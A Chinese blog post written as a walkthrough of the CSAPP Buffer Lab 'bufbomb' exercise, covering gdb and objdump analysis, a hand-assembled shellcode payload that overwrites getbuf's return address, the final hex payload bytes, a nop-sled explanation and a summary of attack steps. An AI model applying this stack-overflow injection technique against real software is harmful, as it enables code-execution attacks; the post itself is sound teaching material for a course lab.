<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="栈溢出," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="前几天沉迷于栈溢出，写篇文章记录一下。在此首先给CSAPP的作者Randal E. Bryant和David R. O’Hallaron献上我的膝盖，然后再给这本书的配套网站和里面的实验室献上。。没有膝盖了，就点个赞吧。">
<meta name="keywords" content="栈溢出">
<meta property="og:type" content="article">
<meta property="og:title" content="真·「stack_overflow」">
<meta property="og:url" content="tangenta.github.io/2017/12/04/stack-overflow/index.html">
<meta property="og:site_name" content="Road to PI&#x2F;2">
<meta property="og:description" content="前几天沉迷于栈溢出，写篇文章记录一下。在此首先给CSAPP的作者Randal E. Bryant和David R. O’Hallaron献上我的膝盖，然后再给这本书的配套网站和里面的实验室献上。。没有膝盖了，就点个赞吧。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="/2017/12/04/stack-overflow/memory.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/fakeEnd.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/typestring.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/getbuf.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/bgetbuf.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/stopAtGetbuf.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/infoRegis1.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/initMem.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/retAddr.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/stringAddr.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/machineCode.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/finish1.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/stack-randomization.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/nop-sled.png">
<meta property="og:image" content="/2017/12/04/stack-overflow/memory.png">
<meta property="og:updated_time" content="2018-01-13T10:52:22.267Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="真·「stack_overflow」">
<meta name="twitter:description" content="前几天沉迷于栈溢出，写篇文章记录一下。在此首先给CSAPP的作者Randal E. Bryant和David R. O’Hallaron献上我的膝盖，然后再给这本书的配套网站和里面的实验室献上。。没有膝盖了，就点个赞吧。">
<meta name="twitter:image" content="/2017/12/04/stack-overflow/memory.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":true,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="tangenta.github.io/2017/12/04/stack-overflow/"/>





  <title>真·「stack_overflow」 | Road to PI/2</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Road to PI/2</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description"></h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="tangenta.github.io/2017/12/04/stack-overflow/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="tangenta">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Road to PI/2">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">真·「stack_overflow」</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-12-04T20:09:00+08:00">
                2017-12-04
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2018-01-13T18:52:22+08:00">
                2018-01-13
              </time>
            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>前几天沉迷于栈溢出，写篇文章记录一下。在此首先给CSAPP的作者Randal E. Bryant和David R. O’Hallaron献上我的膝盖，然后再给这本书的<a href="http://csapp.cs.cmu.edu/2e/home.html" target="_blank" rel="external">配套网站</a>和里面的<a href="http://csapp.cs.cmu.edu/2e/labs.html" target="_blank" rel="external">实验室</a>献上。。没有膝盖了，就点个赞吧。<br><a id="more"></a></p>
<hr>
<p>2018.01.13更新：初次实践，玩溢出的时候走了一些弯路：比如肉眼看内存状况，以及注入冗余代码等等。关于注入代码中的函数调用模拟：</p>
<blockquote>
<p>模拟函数调用是必要的：由于程序不知道我们修改了返回地址，在执行注入代码时，框架指针和栈指针和test的是一样的(认为我们已经返回到了test中)。如果要让<strong>注入代码</strong>的ret正常返回到test中，在ret之前就需要让栈的状态和getbuf的栈状态相同。如何做到相同？模拟getbuf的函数调用。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">movl $0x1005b2b7,%eax</div><div class="line">pushl $0x8048dbe</div><div class="line">pushl %ebp</div><div class="line">movl %esp,%ebp</div><div class="line">subl $0x38,%esp</div><div class="line">leave</div><div class="line">ret</div></pre></td></tr></table></figure></p>
</blockquote>
<p>这段说法存在问题。从代码分析可以发现，用于建立新函数栈的第3-5行可以和用于回收函数栈的第6行相互抵消。而ret的作用仅仅是pop返回地址+程序跳转，除了sp++之外，没有对栈结构造成其他影响。因此也没有“程序认为我们已经返回到了test中”这种说法。。</p>
<p>归根结底，还是对汇编指令与栈结构之间的联系理解得不够深刻。</p>
<hr>
<p>————原文分割线————</p>
<hr>
<p>栈溢出攻击：对于读入字符串时没有边界检查的程序，利用字符串不断写入信息覆盖返回值，使程序计数器跳转到指定位置，执行特定代码的行为。</p>
<p>下面是一个栗子(代码和图片都来自CSAPP)：<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">char</span> *<span class="title">gets</span><span class="params">(<span class="keyword">char</span> *s)</span> </span>&#123;</div><div class="line">	<span class="keyword">int</span> c;</div><div class="line">	<span class="keyword">char</span> *dest = s;</div><div class="line">	<span class="keyword">int</span> gotchar = <span class="number">0</span>; <span class="comment">/* Has at least one character been read? */</span></div><div class="line">	<span class="keyword">while</span> ((c = getchar()) != ’\n’ &amp;&amp; c != EOF) &#123;</div><div class="line">	*dest++ = c; <span class="comment">/* No bounds checking! */</span></div><div class="line">	gotchar = <span class="number">1</span>;</div><div class="line">	&#125;</div><div class="line">	*dest++ = ’\<span class="number">0</span>’; <span class="comment">/* Terminate string */</span></div><div class="line">	<span class="keyword">if</span> (c == EOF &amp;&amp; !gotchar)</div><div class="line">		<span class="keyword">return</span> <span class="literal">NULL</span>; <span class="comment">/* End of file or error */</span></div><div class="line">	<span class="keyword">return</span> s;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="comment">/* Read input line and write it back */</span></div><div class="line"><span class="function"><span class="keyword">void</span> <span class="title">echo</span><span class="params">()</span> </span>&#123;</div><div class="line">	<span class="keyword">char</span> buf[<span class="number">8</span>]; <span class="comment">/* Way too small! */</span></div><div class="line">	gets(buf);</div><div class="line">	<span class="built_in">puts</span>(buf);</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>代码经过gcc -m32编译过后产生一个在IA32处理器上运行的程序。<br>下图为程序执行到echo函数中的gets(buf)时的内存结构，地址数值从上往下递减。寄存器%ebp是echo的框架指针，并且白色矩形从上至下依次为：</p>
<ul>
<li>return address: 函数结束时的返回地址，即PC要跳转的地址;</li>
<li>saved %ebp: echo()调用者的框架指针;</li>
<li>saved %ebx: 具有callee-saved性质的寄存器保存的值;</li>
<li>buf[0]-buf[7]: 在栈上申请的空间，用于存放gets即将读入的字符串。<br><img src="/2017/12/04/stack-overflow/memory.png" width="50%" height="50%"></li>
</ul>
<p>栈溢出攻击要做的就是不断填入字符，一直延伸到返回地址并用“有效返回地址”覆盖它。这样函数在返回的时候PC就会跳转到我们想去的地方，执行想执行的命令，美滋滋。<br>好，今天就到此为止。</p>
<p><img src="/2017/12/04/stack-overflow/fakeEnd.png" width="100%" height="100%"></p>
<p><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br></p>
<p>。。<br><br></p>
<p>到此为止是不可能到此的，这辈子都不可能到此为止，上面只是一个复习而已啦。下面开始进入正题：挽起袖子动手实现栈溢出。<br>原料：CSAPP实验室提供的bufbomb一枚，可以在Buffer Lab的Self-study Handout获得。<br>工具：gdb，objdump，gcc和脑子。</p>
<p>依题意得，该程序会调用下面的test函数：<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span><span class="params">()</span> </span>&#123;</div><div class="line">	<span class="keyword">int</span> val;</div><div class="line">	<span class="comment">/* Put canary on stack to detect possible corruption */</span></div><div class="line">	<span class="keyword">volatile</span> <span class="keyword">int</span> local = uniqueval();</div><div class="line">	val = getbuf();</div><div class="line">	<span class="comment">/* Check for corrupted stack */</span></div><div class="line">	<span class="keyword">if</span> (local != uniqueval()) &#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"Sabotaged!: the stack has been corrupted\n"</span>);</div><div class="line">	&#125;</div><div class="line">	<span class="keyword">else</span> <span class="keyword">if</span> (val == cookie) &#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"Boom!: getbuf returned 0x%x\n"</span>, val);</div><div class="line">		validate(<span class="number">3</span>);</div><div class="line">	&#125; <span class="keyword">else</span> &#123;</div><div class="line">		<span class="built_in">printf</span>(<span class="string">"Dud: getbuf returned 0x%x\n"</span>, val);</div><div class="line">	&#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line"></div><div class="line"> <span class="comment">/* Buffer size for getbuf */</span></div><div class="line"> <span class="meta">#<span class="meta-keyword">define</span> NORMAL_BUFFER_SIZE 32</span></div><div class="line"><span class="function"><span class="keyword">int</span> <span class="title">getbuf</span><span class="params">()</span> </span>&#123;</div><div class="line">	<span class="keyword">char</span> buf[NORMAL_BUFFER_SIZE];</div><div class="line">	Gets(buf);</div><div class="line">	<span class="keyword">return</span> <span class="number">1</span>;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>从命题人的角度分析，这个getbuf()是考察重点。鉴于它想用32个字节的数组容纳键盘输入的数据，看起来像个老实人，试探它一下：<br><img src="/2017/12/04/stack-overflow/typestring.png" width="80%" height="80%"><br>我写了34个字符还能让我走，果然是个老实人，可以欺负。</p>
<p>现在可以定一个小目标：通过外部输入，让test函数执行它的第二个条件分支语句<strong>else if (val == cookie) {…</strong></p>
<p>分析一下，要让首先要让val==cookie成立。(考虑到这是一个assignment，当然要有机制来防止抄袭，这里cookie就是一个根据用户名生成的一个值。这里我的用户名使用的是bovik，对应的cookie值是0x1005b2b7)<br>就是说，要把val改为0x1005b2b7。又观察到val = getfuf()，所以我们只需要把getbuf()的返回值从1改为0x1005b2b7就好了。</p>
<p>具体的流程是，取得程序的控制权-&gt;执行特定的机器指令-&gt;归还控制权。</p>
<p>首先，掏出工具看看getbuf的汇编代码：</p>
<blockquote>
<p><code>$ objdump -d bufbomb | grep -20 &quot;&lt;getbuf&gt;&quot;</code><br><img src="/2017/12/04/stack-overflow/getbuf.png" width="100%" height="100%"><br>可以看到进入函数以后，在栈分配了0x38字节的空间，其中0x28是用来放准备从键盘读入的字符(0x20)和上一级的框架指针位置ebp(0x8);最低的0x8用来存Gets的参数;中间空了的0x8不知道拿来干嘛的。。<br>值得一提的是，这个%eax存放的0x1就是目标，在注入的机器指令中要修改它的值。</p>
</blockquote>
<p>然后侦查一波，检查getbuf调用时的内存状况：</p>
<blockquote>
<p><code>$ gdb ./bufbomb</code>      #  进入gdb<br><code>(gdb) b getbuf</code>        #  在getbuf设置断点<br><code>(gdb) r -u bovik</code>    #  执行，这里的bovik就是用户名<br><img src="/2017/12/04/stack-overflow/bgetbuf.png" width="100%" height="100%"><br>cookie值：0x1005b2b7<br><img src="/2017/12/04/stack-overflow/stopAtGetbuf.png" width="100%" height="100%"><br>好，程序已经停在了断点处，可以开始观察了：<br><code>(gdb) info register</code> #  查看寄存器情况<br><img src="/2017/12/04/stack-overflow/infoRegis1.png" width="100%" height="100%"><br>主要关注ebp和esp。0xb0-0x78 == 0x38，和分析的一致，稳。<br>最关键的部分来了：内存现场<br><code>(gdb) x/80bx $esp</code>   #  以16进制查看从$esp开始，80个字节的内存情况<br><img src="/2017/12/04/stack-overflow/initMem.png" width="100%" height="100%"><br>白色高亮部分左边的0x556835b0就是当前框架指针ebp的值。<br>如果不出意外，这里包含了上级框架指针%ebp地址和返回地址。</p>
</blockquote>
<p>要取得程序的控制权，先要覆盖返回地址。要覆盖返回地址，就必须知道返回地址在哪。那我们先看看正常的返回地址长啥样，看test函数中调用getbuf的下一行：</p>
<blockquote>
<p><code>(gdb） disas test</code>    #  查看test的汇编代码<br><img src="/2017/12/04/stack-overflow/retAddr.png" width="100%" height="100%"><br>getbuf函数调用完之后，程序应该返回0x08048dbe;跟我念，08,04,8d,be。<br>趁着还没忘记，赶紧回到上一张图高亮部分，从后往前看：08..04..8d..be！！！果然没错，就是要覆盖掉这里！<br>(至于为什么要倒过来，这可能就是little endian的哲学了吧。)</p>
</blockquote>
<p>那输入要从哪开始呢？前面getbuf的汇编告诉我们，字符数组从-0x28(%ebp)开始，可以用gdb里面的计算器算一算：</p>
<blockquote>
<p><code>(gdb) p $ebp-0x28</code><br><code>$1 = (void *) 0x55683588 &lt;_reserved+1037704&gt;</code><br><img src="/2017/12/04/stack-overflow/stringAddr.png" width="100%" height="100%"><br>就是说，要填满32个字节之后，还要再填16个字节才能覆盖返回地址。</p>
</blockquote>
<p>下面就面临一个问题了：覆盖了返回地址，去哪？<br><br><br><br><br><br><br><br></p>
<p>当然是去能够执行我给它的机器指令的地方啊！<br>显然，能够注入的指令的地址位置在0x55683588+，那跳转到哪比较合适呢？这时有两个选择：</p>
<ul>
<li>一个是buf[]数组里面，没有副作用，不会腐蚀前一个函数的栈结构，但是能写入的机器指令也很有限：总不能越过刚刚覆盖完的返回地址吧(回到过去杀掉自己的感觉?_?)。</li>
<li>另一个是“覆盖返回地址位置”之后，即0x556835b8+，不过这样很可能腐蚀前一个函数的栈结构，把别人家捣烂了还想不被发现，有点难度。而且别忘了test函数还有个门卫：<strong>volatile int local = uniqueval();</strong>，要是碰到了这个东西就更麻烦了(当然也不是不可以，用注入的机器指令恢复它的值就行。这就要看能不能摸透uniqueval了)。</li>
</ul>
<p>所以，说了这么多，还是尽量选第一个吧。毕竟我们的目标比较简单，目测注入代码也比较少。</p>
<blockquote>
<p>把这一坨东西丢进我“30行的cpp程序”中，去掉没用的信息(没错就是这么懒)<br><code>0x55683588 &lt;_reserved+1037704&gt;:    0x00    0x00    0x00    0x00    0x8d    0xe4    0xe2    0xf7</code><br><code>0x55683590 &lt;_reserved+1037712&gt;:    0x00    0x00    0x00    0x00    0xa8    0x8d    0x04    0x08</code><br><code>0x55683598 &lt;_reserved+1037720&gt;:    0x1f    0x6b    0x00    0x00    0xfc    0x1d    0xfb    0xf7</code><br><code>0x556835a0 &lt;_reserved+1037728&gt;:    0xe0    0x35    0x68    0x55    0xee    0x42    0xef    0xf7</code><br><code>0x556835a8 &lt;_reserved+1037736&gt;:    0x60    0x1d    0xfb    0xf7    0x7e    0xa5    0x04    0x08</code><br><code>0x556835b0 &lt;_reserved+1037744&gt;:    0xe0    0x35    0x68    0x55    0xbe    0x8d    0x04    0x08</code><br>得到<br><code>00 00 00 00 8d e4 e2 f7</code><br><code>00 00 00 00 a8 8d 04 08</code><br><code>1f 6b 00 00 fc 1d fb f7</code><br><code>e0 35 68 55 ee 42 ef f7</code><br><code>60 1d fb f7 7e a5 04 08</code><br><code>e0 35 68 55 be 8d 04 08</code><br>将最后一行修改为”e0 35 68 55 <strong>88 35 68 55</strong>“，最后转成字符输出到文件，执行程序时重定向一下(因为有些字符是键盘上没有的)，就可以跳转到指定位置啦。<br>(在正常情况下这段字符不应含有0x00，因为一般的gets在判断到有0x00对应的字符时，应该是会终止输入的。这里它没有这个限制)</p>
</blockquote>
<p>接下来就要写我们想执行的机器代码了，有些人一上来就拿起本IA32机器指令手册一条一条对照，想想就很激动。<br>我开始也是这么想的，结果发现完全可以：手工写汇编code.s + gcc -c code.s + objdump -d code.o，我倒。</p>
<p>手写汇编代码，主要包含的要点：</p>
<ul>
<li>修改返回值是主要目的：<br><strong>movl $0x1005b2b7,%eax</strong></li>
<li><p>模拟函数调用：<br><strong>pushl $0x8048dbe</strong><br><strong>pushl %ebp</strong><br><strong>movl %esp,%ebp</strong><br><strong>subl $0x38,%esp</strong><br>…<br>模拟函数调用是必要的：由于程序不知道我们修改了返回地址，在执行注入代码时，框架指针和栈指针和test的是一样的(认为我们已经返回到了test中)。如果要让<strong>注入代码</strong>的ret正常返回到test中，在ret之前就需要让栈的状态和getbuf的栈状态相同。如何做到相同？模拟getbuf的函数调用。<br>在模拟之前，首先要理解函数的调用过程：</p>
<ol>
<li><code>call，它的动作是push-and-jump(返回地址压栈，PC跳转);</code></li>
<li><code>push %ebp和mov %esp,%ebp(框架和栈指针合并);</code></li>
<li><code>sub %esp(为该函数分配栈空间，以便存放局部变量);</code></li>
</ol>
<p>由于我们第一步是通过hack了ret来实现的jump，所以并没有完全地按照call的动作，为了完全模拟，需要地址压栈，因此就不难理解第一行的<br><strong>pushl $0x8048dbe</strong>  (test中调用getbuf的下一行的地址)。</p>
</li>
<li>把控制权交回给test：<br><strong>leave</strong><br><strong>ret</strong><br>和getbuf函数的结束操作一样就行了:) 这里就顺便复习下leave和ret吧：<ol>
<li><code>leave是mov %ebp,%esp和pop %ebp(合并框架和栈指针，ebp回退到上一级函数状态)</code></li>
<li><code>ret是pop-and-jump(返回地址出栈，PC跳转)</code></li>
</ol>
</li>
</ul>
<p>最后的机器代码长这样：<br><img src="/2017/12/04/stack-overflow/machineCode.png" width="100%" height="100%"><br>从字符输入的起始位置替换：</p>
<pre><code>68 be 8d 04 08 55 89 e5
83 ec 38 b8 b7 b2 05 10
c9 c3 00 00 fc 1d fb f7
e0 35 68 55 ee 42 ef f7
60 1d fb f7 7e a5 04 08
e0 35 68 55 88 35 68 55
</code></pre><p>将这段机器指令用./hex2raw转换存到string.txt,<br><code>$ ./bufbomb -u bovik &lt; string.txt</code><br><img src="/2017/12/04/stack-overflow/finish1.png" width="100%" height="100%"></p>
<p>大功告成。</p>
<p><br><br><br><br><br><br><br><br><br></p>
<p>但是，还没有结束。<br>我们刚刚完成的是对一个“每次运行都使用相同栈地址”的演示程序的攻击。然鹅，在实际上，绝大多数的程序都会使用ASLR(address-space layout randomization)来作为保护。ASLR中的技术之一：栈随机化(stack randomization)能够有效防止栈溢出攻击。其主要表现为：在不同的时间运行同一段代码，里面使用到的栈地址都很可能不同。这可以通过”每次在程序执行前，在栈上分配一段随机大小的空间”来实现。</p>
<p>这样对于攻击者来说，在覆盖返回地址的时候不得不思考一个问题：-跳转到哪？-当然是能够执行我给它的机器指令的地方啊。-就是哪个地方？ -好像还真不好说，每次都不一样。</p>
<p>一般来说，考虑到程序的空间使用效率，栈随机化分配的空间不会太大。这时，就可以祭出nop-sled了：对于栈随机化程度有限，没有缓冲边界检查的程序，非常好用。那nop-sled到底该怎么用呢？在动手之前，我也有这个疑惑。<br>以下是我实际操作过程中的一些思考：<br>矛盾点在于，<strong>跳转的地址没办法确定为一个值(由于栈随机化)，而输入的攻击字符串却要求是固定的一个值。</strong>覆盖返回地址作为栈溢出攻击的第一步，如果不确定这个值就没法执行注入代码，汇编写得再牛也白搭。</p>
<p>尝试多次执行同一个程序的同一个函数，可以发现栈指针和框架指针的地址都在一定的范围内波动，如下图所示：<br><img src="/2017/12/04/stack-overflow/stack-randomization.png" width="50%" height="50%"><br>可以看到存放数据的buffer的地址也在一定范围内波动。</p>
<p>就是说<strong>跳转的地址要选一个定值，并且无论这个值处于栈结构的哪个位置，最终都能够执行注入的机器指令。</strong></p>
<p>这就容易想到该怎么用nop-sled了：把注入代码存放在buffer的末端，只要找到一个共用地址，并用nop作为背景填充(保证共用地址和注入代码地址之间都是nop)，程序跳转到共用地址后开始执行nop，滑落到注入代码部分，攻击就能够实现。如下图所示：<br><img src="/2017/12/04/stack-overflow/nop-sled.png" width="50%" height="50%"><br>当然这个共用地址也可以划到buffer外面去，不过这样会腐蚀更多的内容，恢复的难度也会相应增加。</p>
<p>下面简单提一提破坏恢复难度。显然，覆盖返回地址，同时也意味着腐蚀了返回地址之前的信息，再次搬出前面的图：<br><img src="/2017/12/04/stack-overflow/memory.png" width="50%" height="50%"></p>
<ul>
<li>saved %ebp被覆盖：这导致上一级框架指针位置信息丢失。如果不考虑这一点，必然导致栈结构腐蚀，很可能导致段错误。</li>
<li>saved %ebx或其他callee-saved的寄存器保存的值被覆盖：如果说上一级%ebp的信息还能通过%esp计算找回来，这种类型的信息一旦丢失，几乎无从找回，或者说找回的难度直接受”原程序计算出该值的方式“影响。要想恢复，汇编功底需要极其深厚。</li>
</ul>
<p>最后，总结一下栈溢出攻击的步骤：</p>
<ol>
<li>试探：看看有没有边界检查</li>
<li>确定覆盖点：在汇编中找到原返回地址，并和正常执行时的内存比对</li>
<li>分析注入代码存放位置：考虑注入代码长度、结构腐蚀的可恢复性</li>
<li>手写汇编代码：爱干啥干啥，如果要做到不留痕迹，恢复破坏的数据</li>
<li>汇编为机器指令，生成字符串：十六进制数字转字符</li>
<li>fire！</li>
</ol>
<p>最后的最后，要想避免自己的程序被别人用这种方式攻击，最简单的方法当然就是做好边界检查，让你写入32个字符就只能写入32个，多半个都不行。</p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    tangenta
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="tangenta.github.io/2017/12/04/stack-overflow/" title="真·「stack_overflow」">tangenta.github.io/2017/12/04/stack-overflow/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/栈溢出/" rel="tag"># 栈溢出</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/10/26/fstream-trap/" rel="next" title="C++读文件操作暗礁">
                <i class="fa fa-chevron-left"></i> C++读文件操作暗礁
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/12/26/gdb-trick/" rel="prev" title="GDB奇技淫巧">
                GDB奇技淫巧 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview sidebar-panel sidebar-panel-active">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="tangenta" />
          <p class="site-author-name" itemprop="name">tangenta</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
           
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">14</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">16</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/tangenta" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                    
                      Github
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://gitee.com/tangenta" target="_blank" title="Gitee">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                    
                      Gitee
                    
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2017 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">tangenta</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
